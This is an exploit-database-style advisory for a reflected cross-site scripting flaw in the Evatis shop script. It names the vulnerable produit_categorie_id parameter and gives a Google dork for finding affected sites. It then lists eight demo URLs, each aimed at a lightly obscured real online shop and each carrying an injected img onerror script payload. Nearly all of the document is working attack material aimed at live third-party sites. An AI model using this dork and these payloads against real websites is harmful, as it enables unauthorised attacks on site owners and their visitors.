######################
# Exploit Title : Evatis Script XSS Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.evatis-dz.com
# Google Dork : inurl:produit_categorie_id=
# Date: 2015/12/1
# Version : All Versions
######################
# Vulnerable Paramter produit_couleur_id= & produit_id
#
#Demo:
#
#http://www.evatis-dXz.com/hygimed-algerie/non-tisse-dispositif-medicaux-usage-unique-chirurg/boutique/?p=produit&produit_categorie_id=84%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.alldoorXs-dz.com/boutique/?p=produit&produit_categorie_id=19%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.marcXouniforme.com/?p=produit&produit_categorie_id=3%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.secXurinet-dz.com/boutique/?p=produit&produit_categorie_id=101%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.eliXxirs.ca/products/?p=produit&produit_categorie_id=81%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.lesenfaXntsdudesign.com/recherche.html?produit_sexe_id=1&produit_tranche_age_id=&produit_categorie_id=%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.promXedicum-dz.com/boutique/?p=produit&produit_categorie_id=83"><img onerror=alert(1) src="asd">
#http://www.mmXcd-dz.com/boutique/?p=produit&produit_categorie_id=67%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
######################